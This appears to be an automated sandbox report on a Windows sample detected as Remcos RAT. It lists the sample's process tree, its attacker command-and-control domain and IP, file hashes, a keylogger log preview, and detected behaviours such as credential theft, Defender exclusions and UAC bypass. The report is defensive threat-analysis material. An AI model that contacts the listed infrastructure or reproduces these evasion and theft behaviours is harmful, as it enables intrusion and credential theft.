                    Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7308, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR
                    Source: Yara match File source: C:\ProgramData\dfgh\logs.dat, type: DROPPED
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: cmd.exe 15_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts12
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Bypass User Account Control
                    1
                    Deobfuscate/Decode Files or Information
                    211
                    Input Capture
MITRE ATT&CK Matrix: the tactic columns and technique cells were spilled into running text during extraction and the matrix layout is not recoverable; the matched behaviours are listed in the Signatures section and in the behavior graph below.
Behavior Graph ID: 1544039
Sample: SecuriteInfo.com.W32.MSIL_K...
Start date: 28/10/2024
Architecture: WINDOWS
Score: 100

Behavior graph as a process tree (node ids in brackets are the graph's own):

• [2] Start
  • DNS/IP: bubemoney7221.duckdns.org (Uses dynamic DNS services); geoplugin.net
  • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
  • [8] SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe started
    • Dropped: C:\Users\user\AppData\...\mXJeXQoaGktJCW.exe (PE32); C:\...\mXJeXQoaGktJCW.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp8E60.tmp (XML); SecuriteInfo.com.W...16672.23413.exe.log (ASCII)
    • Signatures: Tries to steal Mail credentials (via file registry); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
    • [14] SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe started
      • DNS/IP: bubemoney7221.duckdns.org 103.186.117.77 (ports 2404, 49712, 49713; AARNET-AS-APAustralianAcademicandResearchNetworkAARNe; unknown); geoplugin.net 178.237.33.50 (ports 49714, 80; ATOM86-ASATOM86NL; Netherlands)
      • Dropped: C:\ProgramData\dfgh\logs.dat (data)
      • Signatures: Detected Remcos RAT; Maps a DLL or memory area into another process; Installs a global keyboard hook
      • [31] SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe started
        • Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
      • [34] SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe started
        • Signatures: Tries to harvest and steal browser information (history, passwords, etc)
      • [36] SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe started
      • [48] 2 other processes
    • [19] powershell.exe started
      • Signatures: Loading BitLocker PowerShell Module
      • [38] conhost.exe started
      • [40] WmiPrvSE.exe started
    • [21] powershell.exe started
      • [42] conhost.exe started
    • [23] schtasks.exe started
      • [44] conhost.exe started
  • [12] mXJeXQoaGktJCW.exe started
    • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Contains functionality to bypass UAC (CMSTPLUA); 6 other signatures
    • [25] mXJeXQoaGktJCW.exe started
    • [27] schtasks.exe started
      • [46] conhost.exe started
    • [29] mXJeXQoaGktJCW.exe started

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | 24% | ReversingLabs | |
SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | 100% | Avira | HEUR/AGEN.1362875 |
SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | 100% | Avira | HEUR/AGEN.1362875 |
C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | 24% | ReversingLabs | |
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label | Link
http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
http://www.imvu.comr | 0% | URL Reputation | safe |
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe |
http://www.imvu.com | 0% | URL Reputation | safe |
https://login.yahoo.com/config/login | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe |
http://www.ebuddy.com | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bubemoney7221.duckdns.org | 103.186.117.77 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
bubemoney7221.duckdns.org | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
http://www.imvu.comr | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/ | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gp/C | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, mXJeXQoaGktJCW.exe, 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpj | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001187000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gpN | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.imvu.com | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/accounts/servicelogin | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | false | | unknown
https://login.yahoo.com/config/login | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | false | URL Reputation: safe | unknown
http://www.nirsoft.net | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142038542.0000000001384000.00000004.00000010.00020000.00000000.sdmp | false | | unknown
http://www.nirsoft.net/ | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081220556.000000000252A000.00000004.00000800.00020000.00000000.sdmp, mXJeXQoaGktJCW.exe, 0000000A.00000002.2120600305.0000000003349000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.dr | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpSystem32 | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
http://www.ebuddy.com | SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | | 8455 | ATOM86-ASATOM86NL | false
103.186.117.77 | bubemoney7221.duckdns.org | unknown | | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1544039
Start date and time: 2024-10-28 18:36:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winEXE@31/19@3/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 178
• Number of non-executed functions: 316
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
Time | Type | Description
13:36:59 | API Interceptor | 7099730x Sleep call for process: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe modified
13:37:02 | API Interceptor | 38x Sleep call for process: powershell.exe modified
13:37:05 | API Interceptor | 3x Sleep call for process: mXJeXQoaGktJCW.exe modified
18:37:03 | Task Scheduler | Run new task: mXJeXQoaGktJCW path: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
178.237.33.50 | Lista produktów POL56583753Sarchmentdoc.bat | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | odthings.doc | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | withbest.doc | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 1730032807b4b05f98bfde8f6276448daba1a23755e9c274c194747a0e2092fa87b9491fd0424.dat-decoded.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 43655- Urgent - Request for Quotation.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Supplier Purchase Order - PO0002491.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Belialist.exe | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | #PO247762.docx | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
103.186.117.77 | QUOTE.exe | Get hash | malicious | Remcos | Browse |
103.186.117.77 | Quote.exe | Get hash | malicious | Remcos | Browse |
103.186.117.77 | Quote.exe | Get hash | malicious | Remcos | Browse |
103.186.117.77 | Quote.exe | Get hash | malicious | Remcos | Browse |
103.186.117.77 | Quote.exe | Get hash | malicious | Remcos | Browse |
103.186.117.77 | QUOTATION.exe | Get hash | malicious | Remcos | Browse |
103.186.117.77 | Contracts1.exe | Get hash | malicious | Remcos, DBatLoader | Browse |
103.186.117.77 | Contract1348.bat | Get hash | malicious | Remcos, DBatLoader | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
geoplugin.net | Lista produktów POL56583753Sarchmentdoc.bat | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | odthings.doc | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 178.237.33.50
geoplugin.net | withbest.doc | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 1730032807b4b05f98bfde8f6276448daba1a23755e9c274c194747a0e2092fa87b9491fd0424.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | 43655- Urgent - Request for Quotation.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Supplier Purchase Order - PO0002491.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
geoplugin.net | SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Belialist.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
geoplugin.net | #PO247762.docx | Get hash | malicious | Remcos | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ATOM86-ASATOM86NL | Lista produktów POL56583753Sarchmentdoc.bat | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | odthings.doc | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | withbest.doc | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 1730032807b4b05f98bfde8f6276448daba1a23755e9c274c194747a0e2092fa87b9491fd0424.dat-decoded.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | 43655- Urgent - Request for Quotation.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Supplier Purchase Order - PO0002491.exe | Get hash | malicious | Remcos, PureLog Stealer | Browse | 178.237.33.50
ATOM86-ASATOM86NL | SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
ATOM86-ASATOM86NL | Belialist.exe | Get hash | malicious | Remcos, GuLoader | Browse | 178.237.33.50
ATOM86-ASATOM86NL | #PO247762.docx | Get hash | malicious | Remcos | Browse | 178.237.33.50
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | https://startuppro.wethemez.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVVXdzRVWEk9JnVpZD1VU0VSMjExMDIwMjRVNTIxMDIxNTI=N0123 | Get hash | malicious | HTMLPhisher, Mamba2FA | Browse | 103.187.22.30
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | la.bot.mipsel.elf | Get hash | malicious | Unknown | Browse | 150.203.238.120
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | la.bot.m68k.elf | Get hash | malicious | Unknown | Browse | 103.240.0.97
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | la.bot.arm.elf | Get hash | malicious | Unknown | Browse | 103.172.4.125
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | nklm68k.elf | Get hash | malicious | Unknown | Browse | 103.160.103.136
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | la.bot.sparc.elf | Get hash | malicious | Unknown | Browse | 138.7.41.100
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | nabmpsl.elf | Get hash | malicious | Unknown | Browse | 138.44.114.198
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | nabarm.elf | Get hash | malicious | Unknown | Browse | 143.92.28.30
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | nklarm5.elf | Get hash | malicious | Unknown | Browse | 103.162.242.172
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | nabarm7.elf | Get hash | malicious | Unknown | Browse | 103.161.64.95
                                                            No context
                                                            No context
Process: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.379519383183141
Encrypted: false
SSDEEP: 3:rhlKlM+Xl9NxlfPfcl5JWRal2Jl+7R0DAlBG45klovDl6v:6ljRq5YcIeeDAlOWAv
MD5: 8637749F7EC9498D701D040942E6AB32
SHA1: CF2BB65DC1D8CB528245D2DEA6C59E809A8C9F8F
SHA-256: 91864D43A4E7F7C82857508994E9E4E86E01F81870DFF526CFE3AD1B5FA57E07
SHA-512: 8FB0FCD7F94F87CD472F283CCEBE391061BC7D1CC723F378A5243FD95A22F15FF3AF028318C14842D05E26268D8499B77FC655F39F6C321071737203A5F6A2D5
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\dfgh\logs.dat, Author: Joe Security
                                                            Preview:....[.2.0.2.4./.1.0./.2.8. .1.3.:.3.7.:.0.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Process: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):956
                                                            Entropy (8bit):5.015722524181511
                                                            Encrypted:false
                                                            SSDEEP:12:tkTLJwnd6UGkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkwV:qpQdVauKyGX85MEBZvXhNlT3/7l1DYro
                                                            MD5:EEBE2D07DE1EC6311E7B13935B66B5B7
                                                            SHA1:204ECF3E467DB47E44B9010C15932ECDFF5A476D
                                                            SHA-256:9E64D02D8AC9BE1B2CDB358136883E94CD474EEDD8DC653BA6ABA08C499BBBC0
                                                            SHA-512:0EAFA8AA4E5D5D874010A09DB1E77C302E67C532A64D8432BF4CDC52E7A292A9D12223F7CDD67C25F7B17B9310E832D258C8BC14F72334C160E93460B20ED113
                                                            Malicious:false
                                                            Preview:{. "geoplugin_request":"155.94.241.188",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.380747059108785
                                                            Encrypted:false
                                                            SSDEEP:48:lylWSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMuge//YPUyus:lGLHxcIalLgZ2KRHWLOugQs
                                                            MD5:48658F2302B2A2AA9F22D4D58B65B588
                                                            SHA1:C90440D87BAB490012345D0BDFA32C3EFCB1D210
                                                            SHA-256:1D3997D787FA4BEA3B78EB28B01623D55088D6412BE6D420D8D78355505AC7E9
                                                            SHA-512:659C5D45FD2706FB42F05523E670157570F2B1AB008E9222ED7A20CB902F77C00515BA601C0326918445C438FFA66B5888747B034BBC299867C6E019093235D7
                                                            Malicious:false
                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):15728640
                                                            Entropy (8bit):0.10106922760070924
                                                            Encrypted:false
                                                            SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                            MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                            SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                            SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                            SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                            Malicious:false
                                                            Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1587
